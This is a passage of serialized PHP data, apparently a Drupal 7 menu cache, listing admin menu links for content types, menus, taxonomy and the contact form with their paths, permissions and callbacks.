types\";s:7:\"options\";s:142:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"36\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:19:\"node_overview_types\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/structure/types\";s:5:\"title\";s:13:\"Content types\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:47;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"47\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:20:\"admin/structure/menu\";s:11:\"router_path\";s:20:\"admin/structure/menu\";s:10:\"link_title\";s:5:\"Menus\";s:7:\"options\";s:136:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:18:\"menu_overview_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/structure/menu\";s:5:\"title\";s:5:\"Menus\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:94;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"94\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:24:\"admin/structure/menu/add\";s:11:\"router_path\";s:24:\"admin/structure/menu/add\";s:10:\"link_title\";s:8:\"Add menu\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:2:\"94\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:46:\"a:2:{i:0;s:14:\"menu_edit_menu\";i:1;s:3:\"add\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:20:\"admin/structure/menu\";s:8:\"tab_root\";s:20:\"admin/structure/menu\";s:5:\"title\";s:8:\"Add menu\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:110;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"110\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:25:\"admin/structure/menu/list\";s:11:\"router_path\";s:25:\"admin/structure/menu/list\";s:10:\"link_title\";s:10:\"List menus\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"110\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:18:\"menu_overview_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:20:\"admin/structure/menu\";s:8:\"tab_root\";s:20:\"admin/structure/menu\";s:5:\"title\";s:10:\"List menus\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:119;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"119\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:29:\"admin/structure/menu/settings\";s:11:\"router_path\";s:29:\"admin/structure/menu/settings\";s:10:\"link_title\";s:8:\"Settings\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"119\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"menu_configure\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:20:\"admin/structure/menu\";s:8:\"tab_root\";s:20:\"admin/structure/menu\";s:5:\"title\";s:8:\"Settings\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:133;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"133\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:29:\"admin/structure/menu/manage/%\";s:11:\"router_path\";s:29:\"admin/structure/menu/manage/%\";s:10:\"link_title\";s:14:\"Customize menu\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"133\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:4;s:9:\"menu_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:29:\"admin/structure/menu/manage/%\";s:5:\"title\";s:14:\"Customize menu\";s:14:\"title_callback\";s:19:\"menu_overview_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:161;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"161\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:34:\"admin/structure/menu/item/%/delete\";s:11:\"router_path\";s:34:\"admin/structure/menu/item/%/delete\";s:10:\"link_title\";s:16:\"Delete menu link\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"161\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:32:\"a:1:{i:4;s:14:\"menu_link_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:21:\"menu_item_delete_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:34:\"admin/structure/menu/item/%/delete\";s:5:\"title\";s:16:\"Delete menu link\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:166;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"166\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:32:\"admin/structure/menu/item/%/edit\";s:11:\"router_path\";s:32:\"admin/structure/menu/item/%/edit\";s:10:\"link_title\";s:14:\"Edit menu link\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"166\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:32:\"a:1:{i:4;s:14:\"menu_link_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:61:\"a:4:{i:0;s:14:\"menu_edit_item\";i:1;s:4:\"edit\";i:2;i:4;i:3;N;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:32:\"admin/structure/menu/item/%/edit\";s:5:\"title\";s:14:\"Edit menu link\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:170;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"170\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:33:\"admin/structure/menu/item/%/reset\";s:11:\"router_path\";s:33:\"admin/structure/menu/item/%/reset\";s:10:\"link_title\";s:15:\"Reset menu link\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"170\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:32:\"a:1:{i:4;s:14:\"menu_link_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:49:\"a:2:{i:0;s:23:\"menu_reset_item_confirm\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:33:\"admin/structure/menu/item/%/reset\";s:5:\"title\";s:15:\"Reset menu link\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:183;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"183\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:37:\"admin/structure/menu/manage/main-menu\";s:11:\"router_path\";s:29:\"admin/structure/menu/manage/%\";s:10:\"link_title\";s:9:\"Main menu\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"183\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:4;s:9:\"menu_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:29:\"admin/structure/menu/manage/%\";s:5:\"title\";s:14:\"Customize menu\";s:14:\"title_callback\";s:19:\"menu_overview_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:184;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"184\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:38:\"admin/structure/menu/manage/management\";s:11:\"router_path\";s:29:\"admin/structure/menu/manage/%\";s:10:\"link_title\";s:10:\"Management\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"184\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:4;s:9:\"menu_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:29:\"admin/structure/menu/manage/%\";s:5:\"title\";s:14:\"Customize menu\";s:14:\"title_callback\";s:19:\"menu_overview_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:185;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"185\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:38:\"admin/structure/menu/manage/navigation\";s:11:\"router_path\";s:29:\"admin/structure/menu/manage/%\";s:10:\"link_title\";s:10:\"Navigation\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"185\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:4;s:9:\"menu_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:29:\"admin/structure/menu/manage/%\";s:5:\"title\";s:14:\"Customize menu\";s:14:\"title_callback\";s:19:\"menu_overview_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:186;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"186\";s:4:\"plid\";s:2:\"47\";s:9:\"link_path\";s:37:\"admin/structure/menu/manage/user-menu\";s:11:\"router_path\";s:29:\"admin/structure/menu/manage/%\";s:10:\"link_title\";s:9:\"User menu\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:3:\"186\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:4;s:9:\"menu_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:29:\"admin/structure/menu/manage/%\";s:5:\"title\";s:14:\"Customize menu\";s:14:\"title_callback\";s:19:\"menu_overview_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:57;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"57\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:24:\"admin/structure/taxonomy\";s:11:\"router_path\";s:24:\"admin/structure/taxonomy\";s:10:\"link_title\";s:8:\"Taxonomy\";s:7:\"options\";s:117:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:67:\"Manage tagging, categorization, and classification of your content.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"57\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"administer taxonomy\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:1:{i:0;s:30:\"taxonomy_overview_vocabularies\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:24:\"admin/structure/taxonomy\";s:5:\"title\";s:8:\"Taxonomy\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:67:\"Manage tagging, categorization, and classification of your content.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:363;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"363\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:23:\"admin/structure/contact\";s:11:\"router_path\";s:23:\"admin/structure/contact\";s:10:\"link_title\";s:12:\"Contact form\";s:7:\"options\";s:121:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:71:\"Create a system contact form and set up categories for the form to use.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:3:\"363\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer contact forms\";}\";s:13:\"page_callback\";s:21:\"contact_category_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/structure/contact\";s:5:\"title\";s:12:\"Contact 